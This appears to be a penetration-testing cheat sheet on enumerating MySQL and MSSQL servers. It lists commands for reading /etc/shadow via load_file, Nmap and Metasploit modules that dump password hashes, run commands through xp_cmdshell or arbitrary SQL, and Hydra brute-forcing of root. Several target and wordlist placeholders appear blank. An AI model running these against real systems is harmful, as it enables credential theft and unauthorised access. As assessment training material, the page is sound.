# MySQL & MSSQL Enumeration SQL (Structured Query Language) is a programming language used to manage and manipulate databases. It enables tasks like inserting, updating, querying, and deleting data. SQL databases use port 1433 (Microsoft SQL Server), 3306 (MySQL), and 5432 (PostgreSQL) for communication, allowing applications to interact with and retrieve information from structured data repositories. ## MySQL - Basic Enumeration ### Mysql command-line tool The "mysql" command-line tool is used to access and manage MySQL databases, connecting to a server with specified credentials and options. * **Connecting to a MySQL Database Server:** This command is used to connect to a MySQL database server hosted at the specified `` IP address or hostname using the specified `` username. ```bash mysql -h -u ``` **Common MySQL Command-Line Commands:** * **Connect to the Database:** The `;` symbol is used to terminate commands, but it is not a standalone command for connecting. To connect to a database, you typically use: ```sql MySQL [(none)]> use ; ``` * **Count the Records in a Table:** Counts the number of records in the `authors` table. ```sql MySQL [books]> select count(*) from authors; ``` * **Retrieve All Records from a Table:** Retrieves all records from the `authors` table. ```sql MySQL [books]> select * from authors; ``` * **Attempt to Read a File:** Attempts to read the contents of the `/etc/shadow` file, which is a potential security vulnerability if file read access is granted. ```sql MySQL [(none)]> select load_file("/etc/shadow"); ``` ## MySQL & MSSQL: Nmap Enumeration Scripts * **Gather Basic Information:** This command is used with Nmap to gather basic information about Microsoft SQL Server instances during network scanning. ```bash nmap --script ms-sql-info ``` * **Gather NTLM Authentication Information:** This command is employed with Nmap to gather NTLM authentication information from Microsoft SQL Server instances running on port 1443. {% code overflow="wrap" %} ```bash nmap --script ms-sql-ntlm-info --script-args mssql.instance-port=1443 192.168.1.10 ``` {% endcode %} * **Perform Brute-Force Attacks:** This command is used to perform brute-force attacks on Microsoft SQL Server instances using username and password lists located in the specified directory paths. ```bash nmap --script ms-sql-brute --script-args userdb=,passdb= ``` * **Detect Empty (Blank) Passwords:** This command is used with Nmap to detect Microsoft SQL Server instances with empty (blank) passwords. ```bash nmap --script ms-sql-empty-password ``` * **Execute SQL Queries:** This command is used with Nmap to execute a specific SQL query on a Microsoft SQL Server instance using provided credentials and save the output to `output.txt`. {% code overflow="wrap" %} ```bash nmap --script ms-sql-query --script-args mssql.username=,mssql.password=,ms-sql-query.query="SELECT * FROM master..syslogins" -oN output.txt ``` {% endcode %} * **Dump Password Hashes:** This command is used with Nmap to attempt dumping password hashes from a Microsoft SQL Server instance using provided credentials. {% code overflow="wrap" %} ```bash nmap --script ms-sql-dump-hashes --script-args mssql.username=,mssql.password= ``` {% endcode %} * **Execute Commands via `xp_cmdshell`:** This command is used with Nmap to execute the specified command (`ifconfig` in this case) using the `xp_cmdshell` extended stored procedure on a Microsoft SQL Server instance. {% code overflow="wrap" %} ```bash nmap --script ms-sql-xp-cmdshell --script-args mssql.username=admin,mssql.password=pass,ms-sql-xp-cmdshell.cmd="ifconfig" 192.168.1.10 ``` {% endcode %} * **Detect Empty (Blank) Passwords:** This command is used with Nmap to detect MySQL servers with empty (blank) passwords. ```bash nmap --script mysql-empty-password ``` * **Determine if MySQL Servers Provide Empty Password Information:** This command is used with Nmap to determine if MySQL servers provide empty (blank) password information. ```bash nmap --script mysql-empty-info ``` * **Identify MySQL Users:** This command is used with Nmap to identify MySQL users on the target server, attempting to authenticate using the username `root` and an empty password. ```bash nmap --script mysql-users --script-args="mysqluser='root',mysqlpass=''" ``` * **Enumerate MySQL Databases:** This command is used with Nmap to enumerate MySQL databases on the target server, trying to authenticate using the username `root` and an empty password. ```bash nmap --script mysql-databases --script-args="mysqluser='root',mysqlpass=''" ``` * **Retrieve MySQL Server Variables:** This command is used with Nmap to retrieve MySQL server variables from the target, attempting to authenticate with the username `root` and an empty password. ```bash nmap --script mysql-variables --script-args="mysqluser='root',mysqlpass=''" ``` * **Perform a Basic MySQL Security Audit**: This command is employed with Nmap to perform a basic MySQL security audit on the target server. ```bash nmap --script mysql-audit --script-args="mysqluser='root',mysqlpass=''" ``` * **Dump MySQL Password Hashes:** This command is used with Nmap to attempt dumping password hashes from a MySQL server using the username `root` and an empty password. {% code overflow="wrap" %} ```bash nmap --script mysql-dump-hashes --script-args="mysqluser='root',mysqlpass=''" ``` {% endcode %} * **Execute a Specific SQL Query:** This command is used with Nmap to execute a specific SQL query on a MySQL server, using the query `"select count(*) from books.authors;"`, and attempting authentication with the username `root` and an empty password. {% code overflow="wrap" %} ```bash nmap --script mysql-query --script-args="query='select count(*) from books.authors;',username='root',password=''" ``` {% endcode %} * **Perform a MySQL Security Audit with a Specified Audit File:** This command is used with Nmap to perform a MySQL security audit using a specified audit file. {% code overflow="wrap" %} ```bash nmap --script mysql-audit --script-args="mysql-audit.username='root',mysql-audit.password='',mysql-audit.filename='/usr/share/nmap/nselib/data/mysql-cis.audit'" ``` {% endcode %} ## MySQL & MSSQL: Metasploit Enumeration Scripts * **Microsoft SQL Server Commands:** In `msfconsole`, the command `use auxiliary/scanner/mssql/mssql_login` is used to perform login attempts on Microsoft SQL Server instances for credential testing during security assessments. ```bash use auxiliary/scanner/mssql/mssql_login ``` * **Enumerate SQL Server Logins:** In `msfconsole`, the command `use auxiliary/admin/mssql/mssql_enum_sql_logins` is used to enumerate SQL Server logins on a Microsoft SQL Server instance during security assessments. ```bash use auxiliary/admin/mssql/mssql_enum_sql_logins ``` * **Execute Arbitrary SQL Commands:** In `msfconsole`, the command `use auxiliary/admin/mssql/mssql_exec` is used to execute arbitrary SQL commands on a Microsoft SQL Server instance during security assessments. ```bash use auxiliary/admin/mssql/mssql_exec ``` * **Enumerate Domain Accounts:** In `msfconsole`, the command `use auxiliary/admin/mssql/mssql_enum_domain_accounts` is used to enumerate domain accounts on a Microsoft SQL Server instance during security assessments. ```bash use auxiliary/admin/mssql/mssql_enum_domain_accounts ``` * **Scan for Writable Directories:** In `msfconsole`, the command `use auxiliary/scanner/mysql/mysql_writable_dirs` is used to scan for MySQL databases with writable directories for security assessment. ```bash use auxiliary/scanner/mysql/mysql_writable_dirs ``` * **Retrieve MySQL Password Hashes:** In `msfconsole`, the command `use auxiliary/scanner/mysql/mysql_hashdump` is used to retrieve password hashes from a MySQL database for security assessment. ```bash use auxiliary/scanner/mysql/mysql_hashdump ``` ## MySQL: Dictionary Attack * In `msfconsole,` the command `use auxiliary/scanner/mysql/mysql_login` is used to perform login attempts on MySQL servers for credential testing during security assessments. ```bash use auxiliary/scanner/mysql/mysql_login ``` * This command uses Hydra to perform a brute-force attack on a MySQL server located at the specified target. It attempts to guess the password for the "root" username using the "unix\_passwords.txt" wordlist. {% code overflow="wrap" %} ```bash hydra -l root -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt mysql ``` {% endcode %} *** *** *** **`Hacker's Mantra:`**`Garbage can provide important details for hackers: names, telephone numbers, a company’s internal jargon. - Kevin Mitnick`